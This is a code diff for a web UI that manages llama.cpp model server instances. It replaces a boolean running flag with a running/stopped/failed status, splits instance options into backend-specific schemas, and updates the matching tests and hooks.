@@ -214,8 +216,8 @@ describe("InstancesContext", () => {
it("updates instance and maintains it in state", async () => { it("updates instance and maintains it in state", async () => {
const updatedInstance: Instance = { const updatedInstance: Instance = {
name: "instance1", name: "instance1",
running: true, status: "running",
options: { model: "updated.gguf" }, options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
}; };
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance); vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
@@ -230,7 +232,8 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
- model: "updated.gguf",
+ backend_type: BackendType.LLAMA_CPP,
+ backend_options: { model: "updated.gguf" }
});
});
@@ -251,7 +254,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false"); expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance2 starts as not running // instance2 starts as not running
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false" "instance2:stopped"
); );
}); });
@@ -262,7 +265,7 @@ describe("InstancesContext", () => {
expect(instancesApi.start).toHaveBeenCalledWith("instance2"); expect(instancesApi.start).toHaveBeenCalledWith("instance2");
// The running state should be updated to true // The running state should be updated to true
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true" "instance2:running"
); );
}); });
}); });
@@ -276,7 +279,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false"); expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance1 starts as running // instance1 starts as running
expect(screen.getByTestId("instance-instance1")).toHaveTextContent( expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true" "instance1:running"
); );
}); });
@@ -287,7 +290,7 @@ describe("InstancesContext", () => {
expect(instancesApi.stop).toHaveBeenCalledWith("instance1"); expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
// The running state should be updated to false // The running state should be updated to false
expect(screen.getByTestId("instance-instance1")).toHaveTextContent( expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:false" "instance1:stopped"
); );
}); });
}); });
@@ -383,7 +386,7 @@ describe("InstancesContext", () => {
// Test that operations don't interfere with each other
const newInstance: Instance = {
name: "new-instance",
- running: false,
+ status: "stopped",
options: {},
};
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -411,7 +414,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3 expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
// But the running state should change // But the running state should change
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true" "instance2:running"
); );
}); });
}); });

View File

@@ -1,14 +1,19 @@
// ui/src/hooks/useInstanceHealth.ts
import { useState, useEffect } from 'react'
- import type { HealthStatus } from '@/types/instance'
+ import type { HealthStatus, InstanceStatus } from '@/types/instance'
import { healthService } from '@/lib/healthService'
- export function useInstanceHealth(instanceName: string, isRunning: boolean): HealthStatus | undefined {
+ export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => {
- if (!isRunning) {
- setHealth(undefined)
+ if (instanceStatus === "stopped") {
+ setHealth({ status: "unknown", lastChecked: new Date() })
+ return
+ }
+ if (instanceStatus === "failed") {
+ setHealth({ status: instanceStatus, lastChecked: new Date() })
return
}
@@ -17,9 +22,9 @@ export function useInstanceHealth(instanceName: string, isRunning: boolean): Hea
setHealth(healthStatus)
})
- // Cleanup subscription on unmount or when running changes
+ // Cleanup subscription on unmount or when instanceStatus changes
return unsubscribe
- }, [instanceName, isRunning])
+ }, [instanceName, instanceStatus])
return health
}

View File

@@ -1,6 +1,6 @@
- import { type CreateInstanceOptions, getAllFieldKeys } from '@/schemas/instanceOptions'
+ import { type CreateInstanceOptions, type BackendOptions, getAllFieldKeys, getAllBackendFieldKeys } from '@/schemas/instanceOptions'
- // Only define the basic fields we want to show by default
+ // Instance-level basic fields (not backend-specific)
export const basicFieldsConfig: Record<string, {
label: string
description?: string
@@ -21,6 +21,28 @@ export const basicFieldsConfig: Record<string, {
placeholder: '5',
description: 'Delay in seconds before attempting restart'
},
+ idle_timeout: {
+ label: 'Idle Timeout (minutes)',
+ placeholder: '60',
+ description: 'Time in minutes before instance is considered idle and stopped'
+ },
+ on_demand_start: {
+ label: 'On-Demand Start',
+ description: 'Start instance upon receiving OpenAI-compatible API request'
+ },
+ backend_type: {
+ label: 'Backend Type',
+ description: 'Type of backend to use for this instance'
+ }
+ }
+ // Backend-specific basic fields (these go in backend_options)
+ export const basicBackendFieldsConfig: Record<string, {
+ label: string
+ description?: string
+ placeholder?: string
+ required?: boolean
+ }> = {
model: {
label: 'Model Path',
placeholder: '/path/to/model.gguf',
@@ -47,6 +69,10 @@ export function isBasicField(key: keyof CreateInstanceOptions): boolean {
return key in basicFieldsConfig
}
+ export function isBasicBackendField(key: keyof BackendOptions): boolean {
+ return key in basicBackendFieldsConfig
+ }
export function getBasicFields(): (keyof CreateInstanceOptions)[] {
return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
}
@@ -55,5 +81,13 @@ export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
return getAllFieldKeys().filter(key => !isBasicField(key))
}
+ export function getBasicBackendFields(): (keyof BackendOptions)[] {
+ return Object.keys(basicBackendFieldsConfig) as (keyof BackendOptions)[]
+ }
+ export function getAdvancedBackendFields(): (keyof BackendOptions)[] {
+ return getAllBackendFieldKeys().filter(key => !isBasicBackendField(key))
+ }
// Re-export the Zod-based functions
- export { getFieldType } from '@/schemas/instanceOptions'
+ export { getFieldType, getBackendFieldType } from '@/schemas/instanceOptions'

View File

@@ -1,12 +1,8 @@
+ import { BackendType } from '@/types/instance'
import { z } from 'zod'
- // Define the Zod schema
- export const CreateInstanceOptionsSchema = z.object({
- // Restart options
- auto_restart: z.boolean().optional(),
- max_restarts: z.number().optional(),
- restart_delay: z.number().optional(),
+ // Define the backend options schema (previously embedded in CreateInstanceOptionsSchema)
+ export const BackendOptionsSchema = z.object({
// Common params
verbose_prompt: z.boolean().optional(),
threads: z.number().optional(),
@@ -174,22 +170,57 @@ export const CreateInstanceOptionsSchema = z.object({
fim_qwen_14b_spec: z.boolean().optional(),
})
- // Infer the TypeScript type from the schema
+ // Define the main create instance options schema
+ export const CreateInstanceOptionsSchema = z.object({
+ // Restart options
+ auto_restart: z.boolean().optional(),
+ max_restarts: z.number().optional(),
+ restart_delay: z.number().optional(),
+ idle_timeout: z.number().optional(),
+ on_demand_start: z.boolean().optional(),
+ // Backend configuration
+ backend_type: z.enum([BackendType.LLAMA_CPP]).optional(),
+ backend_options: BackendOptionsSchema.optional(),
+ })
+ // Infer the TypeScript types from the schemas
+ export type BackendOptions = z.infer<typeof BackendOptionsSchema>
export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema>
- // Helper to get all field keys
+ // Helper to get all field keys for CreateInstanceOptions
export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] {
return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[]
}
+ // Helper to get all backend option field keys
+ export function getAllBackendFieldKeys(): (keyof BackendOptions)[] {
+ return Object.keys(BackendOptionsSchema.shape) as (keyof BackendOptions)[]
+ }
// Get field type from Zod schema
- export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' {
+ export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' | 'object' {
const fieldSchema = CreateInstanceOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
+ if (innerSchema instanceof z.ZodBoolean) return 'boolean'
+ if (innerSchema instanceof z.ZodNumber) return 'number'
+ if (innerSchema instanceof z.ZodArray) return 'array'
+ if (innerSchema instanceof z.ZodObject) return 'object'
+ return 'text' // ZodString and others default to text
+ }
+ // Get field type for backend options
+ export function getBackendFieldType(key: keyof BackendOptions): 'text' | 'number' | 'boolean' | 'array' {
+ const fieldSchema = BackendOptionsSchema.shape[key]
+ if (!fieldSchema) return 'text'
+ // Handle ZodOptional wrapper
+ const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'

View File

@@ -2,14 +2,22 @@ import type { CreateInstanceOptions } from '@/schemas/instanceOptions'
export { type CreateInstanceOptions } from '@/schemas/instanceOptions'
+ export const BackendType = {
+ LLAMA_CPP: 'llama_cpp'
+ } as const
+ export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]
+ export type InstanceStatus = 'running' | 'stopped' | 'failed'
export interface HealthStatus {
- status: 'ok' | 'loading' | 'error' | 'unknown'
+ status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
message?: string
lastChecked: Date
}
export interface Instance {
name: string;
- running: boolean;
+ status: InstanceStatus;
options?: CreateInstanceOptions;
}

webui/src/vite-env.d.ts vendored Normal file
View File

@@ -0,0 +1,13 @@
/// <reference types="vite/client" />
declare global {
interface ImportMetaEnv {
readonly VITE_APP_VERSION?: string
}
interface ImportMeta {
readonly env: ImportMetaEnv
}
}
export {}

View File

@@ -18,8 +18,9 @@
"baseUrl": ".", "baseUrl": ".",
"paths": { "paths": {
"@/*": ["./src/*"] "@/*": ["./src/*"]
}
}, },
"include": ["src"], "types": ["vite/client"]
},
"include": ["src", "src/vite-env.d.ts"],
"references": [{ "path": "./tsconfig.node.json" }] "references": [{ "path": "./tsconfig.node.json" }]
} }